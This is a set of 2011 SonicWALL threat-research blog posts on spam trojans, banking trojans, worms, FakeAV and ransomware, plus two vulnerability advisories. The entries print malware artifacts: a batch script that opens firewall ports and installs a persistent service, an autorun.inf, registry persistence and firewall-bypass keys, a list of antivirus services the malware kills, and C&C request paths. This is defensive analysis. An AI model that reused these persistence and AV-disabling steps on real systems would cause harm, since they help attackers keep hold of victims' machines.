Tedroo Spam Trojan (Mar 11, 2011)

/in /by

SonicWALL UTM Research discovered a newer variant of Tedroo trojan spreading in the wild. This variant of the Tedroo trojan was in turn found to be spamming the newer variant of Spyeye trojan. When the Tedroo trojan is downloaded and executed it performs the following activities:

  • It creates the following files:
    • %temp%DATF2.tmp.exe (Copy of Itself) [Detected as GAV: Tedroo.AQ (Trojan)]
    • %windir%system32driversstr.sys (encrypted data file)

  • It creates the following registry entry to ensure that the dropped malware runs as a service on every system reboot:
    • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceshxwclmobypwlr: “%temp%DATF2.tmp.exe”

  • It makes the following HTTP requests to a remote IP address:
    • POST /548/getcfg.php – This request returns a configuration file which is encrypted
    • GET /spm/s_get_host.php?ver=548 – This request retuns the public IP address of the infected host
    • GET /spm/s_alive.php?id={removed}&tick=1691546&ver=548&smtp=ok&sl=1&fw=0&pn=0&psr=0
      It reports back information regarding the infected machine with various parameters. Some of the parameters used are:
      • id: random id for infected machine
      • tick: system uptime in milliseconds
      • ver: version of Tedroo
      • smtp: Returns “ok” if SMTP servers are reachable after checking connectivity to mail servers for Mail,Hotmail,Yahoo,Google and AOL
      • fw: returns firewall status
    • GET /spm/s_task.php?id={removed}&tid=38666 – This request returns a list of email addresses, email content to spam and other information

      • screenshot

  • It spams the new Spyeye trojan. The email is crafted to appear like it originates from DHL:

    screenshot

  • The attachment in the email is a zip file which contains the following file:
    • doc.exe [Detected as GAV: Spyeye.Y (Trojan)]

SonicWALL Gateway AntiVirus provides protection against these threats via the following signatures:

GAV: Tedroo.AQ (Trojan)
GAV: Spyeye.Y (Trojan)

screenshot screenshot

New banking Trojan – Tatanga (Mar 4, 2011)

/in /by

SonicWALL UTM Research team received reports of a new banking Trojan named Tatanga in the wild. Spain, Germany, United States & United Kingdom are top countries affected by this Trojan.

This Trojan has many sophisticated features resembling functions found in the popular Crime-ware toolkits Zeus & SpyEye which includes:

  • Encrypted configuration files.
  • Encrypted communication between the bot and the Command & Control server.
  • Dynamic HTML injection affecting users of popular browsers like IE, Firefox, Chrome, Safari etc.
  • Disables AV applications.
  • Harvests e-mail addresses & other sensitive information.
  • Removes other malware infection specifically Zeus.

Upon infection, the Trojan performs following activities on the victim machine:

  • Injects itself into explorer.exe process and conceals its presence on the system. Logs information related to banking session including credentials & uploads it to a remote server.

  • Drops the following files:
    • %User Application Data%MicrosoftInternet Explorer report.exe <- Copy of itself [ Detected as: GAV: Tatanga.gen (Trojan) ]
    • %User Local Settings%Temp report.dll <- [ Detected as: GAV: Pincav.BAHA (Trojan) ]
    • %User Application Data%Help a.dll
    • %User Application Data%Help d.dll
    • %User Application Data%Help n.dll
    • %User Application Data%Help p.dll

      • DLL files dropped in Help directory are encrypted data files.

  • Attempts to communicate with C&C server via a predetermined list of compromised web sites.

    • screenshot

  • Disables the host Antivirus application.

  • Adds following registry entry to bypass firewall restrictions:
    • Key: [HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList] Value: “c:windowsexplorer.exe”
      Data: “c:windowsexplorer.exe:*:Enabled:explorer”

Screenshots showing some statistics from control panel used by this banking Trojan:

screenshot

screenshot

SonicWALL Gateway AntiVirus provides protection against this Trojan via following signature:

  • GAV: Tatanga.gen (Trojan)

VideoLAN VLC Media Player Subtitle Heap BO (Mar 03, 2011)

/in /by

VideoLAN is a project that develops software for playing video and other media formats across a local area network (LAN). It originally developed two programs for media streaming, VideoLAN Client (VLC) and VideoLAN Server (VLS), but most of the features of VLS have been incorporated into VLC, with the result renamed VLC media player. VLC media player is a free and open source media player and multimedia framework.

VLC media player can play many audio and video formats (MPEG, DivX, ogg, Wave etc.) as well as various streaming protocols. The Matroska Multimedia Container, an open standard, free container format, is one that can be played by VLC media player. The Matroska can hold an unlimited number of video, audio, picture or subtitle tracks inside a single file. It is intended to serve as a universal format for storing common multimedia content, like movies or TV shows. Matroska is similar in concept to other containers like AVI, MP4 or ASF, but is entirely open in specification, with many implementations in open source software. Matroska file types are .MKV for video (with subtitles and audio), .MKA for audio-only files and .MKS for subtitles only.

The Matroska file format is based on Extensible Binary Meta Language (EBML), a generalized file format similar to XML. The Matroska files only have two different top level elements, EBML and Segment. The Segment is the top level container for multimedia data. The Tracks element contains information about the tracks that are stored in the Segment, such as track type (audio, video, subtitles), the codec used, resolution and sample rate.

A heap buffer overflow vulnerability exists in VLC Media player. When handling subtitles, the application can overflow a heap buffer through lack of bounds checking in the StripTags() function while processing strings with an opening “<" without the terminating ">“. A remote attacker could exploit this vulnerability to overflow the heap buffer and inject arbitrary code. The injected code will be run under the security context of the logged in user.

SonicWALL IPS team has researched the vulnerability and created the following IPS signature to cover exploits related to it:

  • 6286 VideoLAN VLC Media Player Subtitle Heap BO Exploit 1
  • 6287 VideoLAN VLC Media Player Subtitle Heap BO Exploit 2

The vulnerability is referred by CVE as CVE-2011-0522

New Windows Live Messenger worm (Feb 25, 2011)

/in /by

The SonicWALL UTM Research team received reports of a new variant of a Windows Live messenger Worm propagating in the wild. This Worm spreads by presenting various links to users on the MSN contact list of the compromised user. The Worm also downloads FakeAV software upon installation.

An unsuspecting user may receive a message over the MSN Messenger network containing a link to a malicious file:

Upon execution of the downloaded file, the FakeAV software will display the following pop-up:

It will perform a fake scan of the system:

Upon pressing “Yes” the Trojan will pop up a payment page in Internet Explorer for purchasing the FakeAV software:

The worm performs the following DNS queries:

  • www.startacademy.be
  • host5500.net

It downloads www.{removed}/bb.exe [Detected as GAV: Buzus.HAPC (Trojan)] and renames the file to 4417934.exe

The following files are dropped on the compromised system:

  • C:Documents and Settings{USER}Application Datamsnsvconfig.txt
  • C:Documents and Settings{USER}Local SettingsTemp4417934.exe [Detected as GAV: Buzus.HAPC (Trojan)]
  • C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe [Detected as GAV: Buzus.HAPC (Trojan)]

Registry modification:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun Microsoft(R) Service Update “C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe “C:Documents and Settings{USER}Microsoft-Driver-1-52-2475-9627-8645winrsvn.exe:*:Enabled:Microsoft(R) Service Update”

SonicWALL Gateway AntiVirus provides protection against this malware via following signatures:

  • GAV: Buzus.HAPC (Trojan)
  • GAV: IRCBot.DTO_2 (Trojan)

Koobface.HJV – Spreading in the wild (Feb 04, 2011)

/in /by

The Sonicwall UTM Research team discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.

The Worm performs the following DNS queries:

  • www.google.com
  • facebook.com
  • www.facebook.com
  • d.static.ak.fbcdn.net
  • x-treme-radio.host22.com
  • www.ashiww.com
  • www.wahdohotel.nl
  • kingswoodwright.com
  • kbfgb.greyzzsecure9.com
  • 3064972.greyzzsecure9.com

The Worm attempts to load various web pages using random page names with the .css extension:

  • http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
  • http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css
  • http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css
  • http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css
  • http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css
  • http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css
  • http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css
  • http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css
  • http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css
  • http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css

The Worm installs the following files on the system:

  • C:Documents and Settings{USER}Local SettingsTempfeb.bat
  • C:Documents and Settings{USER}Local SettingsTempzpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
  • C:Documents and Settings{USER}Local SettingsTempzpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
  • C:WINDOWS5456456z
  • C:WINDOWSbt7.dat
  • C:WINDOWSjjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
  • C:WINDOWSsystem32feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
  • C:WINDOWSsystem32driversfeb.sys [Detected as GAV: Koobface.FF (Trojan)]

feb.bat contains:

      netsh firewall add allowedprogram name="feb" program="C:WINDOWSsystem32svchost.exe" mode=enable
      netsh firewall add portopening tcp 8087 feb enable
      sc create "ffeb" type= interact type= share start= auto binpath= "C:WINDOWSsystem32svchost.exe -k ffeb"
      reg add "hklmsystemcurrentcontrolsetservicesffebparameters" /v servicedll /t reg_expand_sz /d "C:WINDOWSsystem32feb.dll" /f
      reg add "hklmsystemcurrentcontrolsetservicesffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
      reg add "hklmsoftwaremicrosoftwindows ntcurrentversionsvchost" /v ffeb /t reg_multi_sz /d "ffeb" /f
      sc start ffeb

feb.dll contains a list or URL’s all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL’s contained feb.dll:

  • impri{removed}.gr/.lhinrs/
  • hk{removed}.org/.ycguh3/
  • roomservi{removed}.com.au/.9mov05w/
  • nubs.wo{removed}.co.uk/.7txq/
  • lenga{removed}.com/.ck5rg8/
  • cayenneo{removed}.com/.fplf/
  • www.dead{removed}.co.uk/.qe9v/
  • ib{removed}.org.il/.5cei7f9/
  • www.kurdist{removed}.com/.x5fyik/
  • heali{removed}.co.za/.12vatd/
  • forwardmar{removed}.org/.6sta03t/
  • numerus-{removed}.fr/.li81/
  • fino{removed}.com/.ea2cuwa/
  • fe{removed}.co.za/.jts51/
  • tarr{removed}.com/.5fu3/
  • toppla{removed}.nl/.vfnc/
  • www.fishingfo{removed}.com/.5wmm9/

The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer NoAutoUpdate dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer NoWindowsUpdate dword:00000001
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvcHost ffeb hex(7):66,66,65,62,00,00,
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun dfg49df “c:windowsjjp156.exe”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FEB NextInstance dword:00000001
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FEB000 Service “feb”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesfeb ImagePath hex(2):”??C:WINDOWSsystem32driversfeb.sys”

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV landing page:

  • http://3064972.greyzzsecure9.com/defender/?914ea0a274=vmzd&8a83854da2d=jjdjtamdvz&5f701=jvottyajzt

screenshot

When clicking on “Remove all” or “Cancel” it attemps to initiate the download of:

  • bitav_2053_ext6.exe [Detected as GAV: TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as:

  • pack.exe [Detected as GAV: SecurityTool.W (Trojan)]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Koobface.HJV (Worm)
  • GAV: Koobface.HJV_2 (Worm)
  • GAV: Koobface.HJV_3 (Worm)
  • GAV: Koobface.FF (Trojan)
  • GAV: Delf.EM (Trojan)
  • GAV: TDSS.ABCR (Trojan)
  • GAV: SecurityTool.W (Trojan)

Buzus.GDEF – Mass-Mailing Worm (Feb 18, 2011)

/in /by

SonicWALL UTM Research team received reports of a new variant of mass-mailing worm propagating in the wild. This worm propagates through emails,P2P applications, network and removable drives.

Process of Infection:

An unsuspecting user may receive an email with the malware attachment. This worm can send emails as follows:

From: invitations@twitter.com
Subject: Your friend invited you to Twitter!
Attachment: Invitation Card.zip

    screenshot

From: order-update@amazon.com
Subject: Shipping update for your Amazon.com order
Attachment: Shipping documents .zip

    screenshot

From: update@facebookmail.com
Subject: You have got a new message on Facebook!
Attachment: Facebook message.zip

    screenshot

From: e-cards@hallmark.com
Subject: You have received A Hallmark E-Card!
Attachment: Postcard.zip

    screenshot

From: invitations@hi5.com
Subject: Laura would like to be your friend on hi5!
Attachment: Invitation Card.zip

    screenshot

From: resume-thanks@google.com
Subject: Thank you from Google!
Attachment: CV-20100120-112.zip

    screenshot

It may also send a phishing email:

    screenshot

Installation:

Once the user opens and executes the attachment, it will do the following:

Drops a copy of itself:

  • WINDOWSsystem32PCSuite.exe – [ detected as GAV: Buzus.GDEF (Trojan) ]
  • WINDOWSsystem32sta-css.exe – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWS{random}.dll – [ detected as GAV: (Cloud) Mufanom.APSW (Trojan) ]
  • WINDOWSsystem32stat-cpe.exe – [ detected as GAV: Twain.A (Trojan) ]

Registry Changes

Adds the following registry entries to ensure that the malware runs on every system startup.

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
    Value: Nokia Launch Application
    Data: “C:WINDOWSSystem32PCSuite.exe”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
    Value: Yravasaxog
    Data: “WINDOWSw3dyu1.dll”,Startup””

Added the following registries as part of its installation:

  • Key: HKEY_CURRENT_USERSoftwareNokia4
  • Key: HKEY_LOCAL_MACHINESoftwareNokia4
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer nok01 “11”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer nok01 “24”
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem EnableLUA dword:00000000
  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurity CenterUACDisableNotify InNewValue dword:00000001

Adds following registry entry to bypass firewall restrictions:

  • Key: [HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList] Value: “C:WINDOWSsystem32PCSuite.exe”
    Data: “C:WINDOWSsystem32PCSuite.exe:*:Enabled:Explorer”

Mutex

Creates this mutex to ensure only a single instance is running in the memory.

  • PCSuite.exeDm28sf0V@XK$NX8hOu

Propagation

Removable Drives

Drops Autorun.inf and copy of itself as redmond.exe on and removable drives.

    [autorun]
    open= RECYCLER S-1-6-21-2434476521-1645641927-702000330-1542redmond.exe
    icon=%SystemRoot%system32SHELL32.dll,4
    action=Open folder to view files
    shellopen=Open
    shellopencommand= RECYCLER S-1-6-21-2434476521-1645641927-702000330-1542redmond.exe
    shellopendefault=1

Peer-2-Peer Application

May copy itself in the following folders using listed filenames below:

Folder:

  • C:program filesicqshared folder
  • C:program filesgrokstermy grokster
  • C:program filesemuleincoming
  • C:program filesmorpheusmy shared folder
  • C:program fileslimewireshared
  • C:program filesteslafiles
  • C:program fileswinmxshared
  • C:Downloads

Filename:

  • Ad-aware 2010.exe
  • Adobe Acrobat Reader keygen.exe
  • Adobe Illustrator CS4 crack.exe
  • Adobe Photoshop CS5 crack.exe
  • Alcohol 120 v1.9.7.exe
  • Anti-Porn v13.5.12.29.exe
  • AnyDVD HD v.6.3.1.8 Beta incl crack.exe
  • Ashampoo Snap 3.02.exe
  • AVS Video Converter v6.3.1.365 CRACKED.exe
  • BitDefender AntiVirus 2010 Keygen.exe
  • Blaze DVD Player Pro v6.52.exe
  • CleanMyPC Registry Cleaner v6.02.exe
  • Daemon Tools Pro 4.50.exe
  • Divx Pro 7 + keymaker.exe
  • Download Accelerator Plus v9.exe
  • Download Boost 2.0.exe
  • DVD Tools Nero 10.5.6.0.exe
  • G-Force Platinum v3.7.5.exe
  • Google SketchUp 7.1 Pro.exe
  • Grand Theft Auto Episodes From Liberty City 2010.exe
  • Image Size Reducer Pro v1.0.1.exe
  • Internet Download Manager V5.exe
  • Kaspersky AntiVirus 2010 crack.exe
  • K-Lite Mega Codec v5.5.1.exe
  • K-Lite Mega Codec v5.6.1 Portable.exe
  • LimeWire Pro v4.18.3.exe
  • MagicISO Magic ISO Maker v5.5.0276 Cracked.exe
  • McAfee Total Protection 2010.exe
  • Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe
  • Motorola
  • Mp3 Splitter and Joiner Pro v3.48.exe
  • ms09-067.exe
  • Myspace theme collection.exe
  • Nero 9 9.2.6.0 keygen.exe
  • Norton Anti-Virus 2010 crack.exe
  • Norton Internet Security 2010 crack.exe
  • PCSuite.exe
  • PDF password remover (works with all acrobat reader).exe
  • PDF to Word Converter 3.0.exe
  • PDF Unlocker v2.0.3.exe
  • PDF-XChange Pro.exe
  • Power ISO v4.2 + keygen axxo.exe
  • Rapidshare Auto Downloader 3.8.exe
  • RapidShare Killer AIO 2010.exe
  • Sony Vegas Pro v9.0a incl crack.exe
  • Sophos antivirus updater bypass.exe
  • Starcraft2 battle.net key generator.exe
  • Starcraft2 battle.net keys.txt.exe
  • Starcraft2.exe
  • Starcraft2 REGION-UNLOCKER.exe
  • Starcraft2 SERVER-CHANGER.exe
  • Super Utilities Pro 2009 11.0.exe
  • Total Commander7 license+keygen.exe
  • Trojan Killer v2.9.4173.exe
  • Tuneup Ultilities 2010.exe
  • Twitter FriendAdder 2.1.1.exe
  • Uniblue RegistryBooster 2010.exe
  • VmWare 7.0 keygen.exe
  • VmWare keygen.exe
  • Winamp.Pro.v7.33.PowerPack.Portable+installer.exe
  • Windows 2008 Enterprise Server VMWare Virtual Machine.exe
  • Windows2008 keygen and activator.exe
  • Windows 7 Ultimate keygen.exe
  • Windows XP PRO Corp SP3 valid-key generator.exe
  • WinRAR v3.x keygen RaZoR.exe
  • YouTubeGet 5.4.exe
  • Youtube Music Downloader 1.0.exe

Email Propagation

Harvests email addresses from files with the following extensions:

  • asp
  • dbx
  • doc
  • htm
  • log
  • lst
  • nfo
  • php
  • rtf
  • txt
  • wab
  • wpd
  • wps
  • xls
  • xml

It avoids sending email with addresses having the following strings:

  • .com
  • .gov
  • .mil
  • abuse
  • acd-group
  • acdnet.com
  • acdsystems.com
  • acketst
  • admin
  • ahnlab
  • alcatel-lucent.com
  • anyone
  • apache
  • arin.
  • avg.comsysinternals
  • avira
  • badware
  • berkeley
  • bitdefender
  • bluewin.ch
  • borlan
  • bpsoft.com
  • bsd
  • bugs
  • buyrar.com
  • ca
  • certific
  • cisco
  • clamav
  • contact
  • debian
  • drweb
  • eset.com
  • example
  • f-secure
  • fido
  • firefox
  • fsf.
  • ghisler.com
  • gimp
  • gnu
  • gold-certs
  • gov.
  • help
  • honeynet
  • honeypot
  • iana
  • ibm.com
  • icrosoft
  • idefense
  • ietf
  • ikarus
  • immunityinc.com
  • info
  • inpris
  • isc.o
  • isi.e
  • jgsoft
  • kaspersky
  • kernel
  • lavasoft
  • linux
  • listserv
  • mcafee
  • me
  • messagelabs
  • mit.e
  • mozilla
  • mydomai
  • no
  • nobody
  • nodomai
  • noone
  • not
  • nothing
  • novirusthanks
  • ntivi
  • nullsoft.org
  • page
  • panda
  • pgp
  • postmaster
  • prevx
  • privacy
  • qualys
  • quebecor.com
  • rating
  • redhat
  • rfc-ed
  • root
  • ruslis
  • sales
  • samba
  • samples
  • secur
  • security
  • sendmail
  • service
  • site
  • slashdot
  • soft
  • somebody
  • someone
  • sopho
  • sourceforge
  • spam
  • spm
  • ssh.com
  • submit
  • sun.com
  • support
  • suse
  • syman
  • tanford.e
  • the.bat
  • unix
  • usenet
  • utgers.ed
  • virus
  • virusbuster
  • webmaster
  • websense
  • winamp
  • winpcap
  • wireshark
  • www.ca.com
  • www
  • you
  • your

Queries available Mail-Exchange Server to send the email:

    screenshot

Other System Modification:

Delete files from the following directories:

  • Program Filesprevx

Delete files related to the following registry entry:

  • HKEY_LOCAL_MACHINESOFTWAREMcAfeeAVEngine szInstallDir = “mcshield.exe”
  • HKEY_LOCAL_MACHINESOFTWAREMalwarebytes’ Anti-Malware InstallPath = *.*”

Terminates the following services related to AV security softwares:

  • AVP
  • AntiVirSchedulerService
  • Arrakis3
  • CSIScanner
  • CaCCProvSP
  • ERSvc
  • Ehttpsrv
  • Emproxy
  • FPAVServer
  • GWMSRV
  • K7EmlPxy
  • K7RTScan
  • K7TSMngr
  • LIVESRV
  • LiveUpdate Notice Service
  • MBAMService
  • MCNASVC
  • MPFSERVICE
  • MPS9
  • McAfee HackerWatch Service
  • Norton AntiVirus
  • PANDA SOFTWARE CONTROLLER
  • PAVFNSVR
  • PAVPRSRV
  • PAVSVR
  • PSHOST
  • PSIMSVC
  • PSKSVCRETAIL
  • RSCCenter
  • RSRavMon
  • SAVScan
  • SUM
  • Savadminservice
  • Savservice
  • Sophos Agent
  • Sophos Autoupdate Service
  • Sophos Certification Manager
  • Sophos Management Service
  • Sophos Message Router
  • Symantec Core LC
  • TPSRV
  • ThreatFire
  • VSSERV
  • WerSvc
  • WinDefend
  • XCOMM
  • antivirservice
  • avast! Antivirus
  • avast! Mail Scanner
  • avast! Web Scanner
  • avg8emc
  • avg8wd
  • bdss
  • ccEvtMgr
  • ccproxy
  • ccpwdsvc
  • ccsetmgr
  • ekrn
  • liveupdate
  • mcODS
  • mcmisupdmgr
  • mcmscsvc
  • mcpromgr
  • mcproxy
  • mcredirector
  • mcshield
  • mcsysmon
  • msk80service
  • navapsvc
  • npfmntor
  • nscservice
  • sbamsvc
  • scan
  • sdauxservice
  • sdcodeservice
  • sndsrvc
  • spbbcsvc
  • wscsvc

C&C Server

Sends information to the following remote server:

    153.26.137.241

Anti-debugging Technique

Checks for the following SoftIce Debugger driver:

  • \.SICE
  • \.NTICE
  • \.SIWVIDSTART

Anti-VMware:

Checks if its running in VMWare

  • \.VMDRV

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Buzus.GDEF (Trojan) (Trojan)
GAV: Twain.A (Trojan)
GAV: Mufanom.APSW (Trojan)
GAV: (Cloud) Mufanom.APSW (Trojan)

screenshot

MS Windows Active Directory BO (Feb 18, 2011)

/in /by

Microsoft Windows Active Directory is a directory service running on Windows domain controllers. Active Directory utilizes the Computer Browser service technology to collect, distribute, and obtain information about workgroups, domains, and individual hosts on a network.

The Computer Browser service typically uses connectionless server broadcasts to communicate between nodes. Registration, announcements, and browser elections are performed by the service to provide the network with a list of available resources. Individual nodes on a browser system play various browser roles. There are five browse service roles that computers can play in the browser system:

Non-Browser Potential Browser Backup Browse Server Master Browse Server Domain Master Browser

All Windows Server 2003 domain controllers are configured as either master browse servers or backup browse servers. A server broadcasts a Host Announcement message on startup to announce its presence to the master browse server. The process of adding a new server entry to the master browse server’s browse list is called registration. In the case where there is no WINS server, all name registrations as well as name lookups are done by UDP broadcast. Where a WINS server is used, the Windows client will use UDP unicast to register with the WINS server. This name is registered by the master browse server and is used to broadcast and receive domain announcements on the local subnet. A Browser Election takes place to select a new master browse server under the following circumstances:

A host cannot locate a master browse server Preferred master browse server comes online Windows-based domain controller starts A back-up browse server cannot contact the master browse server

A computer initiates an election by broadcasting a Browser Election Request. The Browser Election Request is transmitted over SMB. This request has the following format:

Offset Size Description ------ ---- ----------------------------------------------------------- 0x0000 1    Command  0x0001 1    Election Version 0x0002 4    Election Criteria 0x0006 4    Client uptime  0x000A 4    Unused 0x000E N    Null-terminated ASCII server name

If a browser receives this request with a lower ranking of election criteria than its own, then the browser sends its own Browser Election Request. If the browser does not have a higher ranking value then the browser attempts to determine which computer is the new master browse server.

A heap overflow vulnerability exists in Microsoft Windows Server 2003, when configured as an Active Directory server. The vulnerability is due to a boundary error in the kernel component of the Windows Browsing service that is responsible for handling the incoming Browsing Election Requests. The vulnerable code fails to properly handle overly long ServerName field values. When an overly long ServerName field is encountered, the code allocates a fixed size buffer to store multiple fields, starting with the ServerName field. A ServerName field that is longer than the allowable size, will cause the calculation of the size of the remainder of the buffer to be equal to zero. Later on in the process flow, this zero size is decreased by one, causing an integer underflow. The code performs additional calculations on the value at which point it uses the final value as the size for a double word copy operation into the aforementioned buffer. The copy operation overruns the buffer and corrupts memory. This condition can potentially lead to overwritten function pointers and code injection and execution. Successful exploitation may lead to kernel-level code injection and execution. Unsuccessful code execution attacks may cause a target system to crash, leading to a system-wide denial of service condition.

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 6253 -MS Windows Active Directory BROWSER ELECTION BO Attempt

In addition to this threat specific signature, SonicWALL routinely releases generic signature that detect frequently used byte patterns in exploitation attempts of vulnerabilities such as this one.

This vulnerability has been assigned the id CVE-2011-0654 by mitre.

Valentine's day FakeAV woes (Feb 11, 2011)

/in /by

SonicWALL UTM Research team discovered instances of polluted results appearing in search engine results for Valentine’s day related search terms. Malware authors often use SEO poisoning campaigns to lure unsuspecting users in to following malicious links strategically placed in search engine results. We observed similar campaigns in the past for “Wikileaks” and “Holiday Shopping” related keywords. It is evident from the new instances of polluted results that malware authors have updated their landing page and associated FakeAV executables . The search term “Valentines Day Gifts” leads users to the polluted search result shown below:

screenshot

If the user clicks on the malicious link in the search results then it performs the following on the victim’s machine:

  • The initial link redirects users to a FakeAV landing page.

    screenshot

  • If the user downloads and runs the FakeAV executable then it performs the following on the victim’s machine:
    • Drops the following files:
      • %USERPROFILE%Application DatafPgHcEm13400fPgHcEm13400.exe (Copy of Itself) [Detected as FakeAlert.MHF (Trojan)]
      • %USERPROFILE%Application DatafPgHcEm13400fPgHcEm13400

    • Creates the following registry entry to ensure that the dropped malware runs on every system reboot:
      • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce: “fPgHcEm13400:%USERPROFILE%Application DatafPgHcEm13400fPgHcEm13400.exe”

    • It changes the wallpaper with the following text:
      • WARNING!
        YOU’RE IN DANGER!
        YOUR COMPUTER IS INFECTED WITH SPYWARE!

        ALL YOU DO WITH COMPUTER IS STORED FOREVER IN YOUR HARD DISK.
        WHEN YOU VISIT SITES,SEND EMAIL… ALL YOUR ACTIONS ARE
        LOGGED. AND IT IS IMPOSSIBLE TO REMOVE THEM WITH STANDARD TOOLS. YOUR DATA IS STILL AVAILABLE FOR FORENSICS. AND IN SOME CASES

        FOR YOUR BOSS, YOUR FRIENDS, YOUR WIFE, YOUR CHILDREN.
        Every site you or somebody or even something , like spyware, opened in your browsers,
        with all the images, and all the downloaded and maybe later removed movies or mp3 songs –
        ARE STILL THERE and could break your life !

        SECURE YOURSEFL RIGHT NOW! REMOVE ALL SPYWARE FROM YOUR PC!

    • It launches fake scans and when the user attempts to clean the machine a screen is displayed asking for credit card and personal information:

        screenshot

SonicWALL Gateway AntiVirus provided protection against this threat via following signatures:

GAV: FakeAlert.MHF (Trojan)

The holiday season has passed (Feb 03, 2011)

/in /by

The holiday season has passed (Feb 03, 2011)

One month after the Christmas and New Year’s Day, does everybody come back to work? Of course, there is no more shopping, surfing online and gossiping. Let’s get the proof.

First, let’s check the most popular regular online applications people are using for the last couple of months. People like surfing everywhere, such as shopping websites, so, the web analytics statistics application are no doubt the most popular ones, for example, Google Analytics; people like Social Networking, such as Facebook; network Security is an issue, so, people are downloading more software security updates, such as Microsoft Windows Updates. Let’s see how people were using them during the holidays compared to before and after. The spike for the applications started at Nov 15th 2010 and grew gradually, and topped at Dec 14th 2010, and dropped sharply at Dec 17th 2010. The hits amount is almost 14 times of a regular work day.

Application Hits

Second, let’s see the IM, P2P and Multimedia software people like. People still like eMule, BitTorrent to download software/movies; people like Multi-media stream like Shockwave Flash (SWF), PPStream, YouTube; People like Skype, Windows Live Messenger to chat online. The following is the graph for IM, P2P and multi-media online software during the last few months. For the spike of the IM, P2P and Multimedia, it started at Nov 16th 2010 and grew gradually, and topped at Dec 13th 2010, and dropped sharply at Dec 16th 2010. The hits amount is almost 8 times of a regular work day.

IM P2P Multimedia Hits

Third, hackers are happy as they have time to have fun, post more malicious web pages and got more targets, or make some money… OK, let’s take a look. The spike started at Nov 11th 2010 and grew gradually, and topped at Dec 13th 2010, and dropped sharply at Dec 16th 2010. The hits amount is almost 80 times of a regular work day.

IPS Hits

Forth, Trojans/Viruses were not spread so widely during the holiday season. Let’s take a look. The spike started at Nov 18th 2010 and grew slowly, and topped at Dec 15th 2010, and dropped sharply at Dec 16th 2010. The hits amount is almost 6 times of a regular work day.

GAV Hits

Guys, back to work. Don’t you see the traffic is back to normal?

PornoBlocker – Trojan Ransomware (Jan 27, 2011)

/in /by

SonicWALL UTM Research team received reports of a new variant of Trojan Ransomware seen in the wild. The Trojan locks down the system and asks the user to send money via premium SMS in Russia to receive the unlock code.

Process of Infection:

An unsuspecting user may download the Trojan from malicious websites. The screenshot below shows the Trojan using a movie icon.

screenshot

Once installed, the Trojan will lock down the system by displaying the image below:

screenshot

Below is the rough translation of the image:

    Attention!!!

    Your Operating System is blocked for violation of Internet usage.

    We discovered the following violations: visiting pornographic sites with elements of child porn, rape and bestiality. Storage of video files containing porn with presence of under-aged, rape, bestiality etc.

    Usage of pirated software.

    This block is intended to prevent the possibility of spreading this material over the internet.
    To remove this block you must:

    Replenish Beeline account number:
    8-903-202-99-12
    For the amount of 400 rubles

    After the payment on your receipt you will find a code, which you should enter in the field below

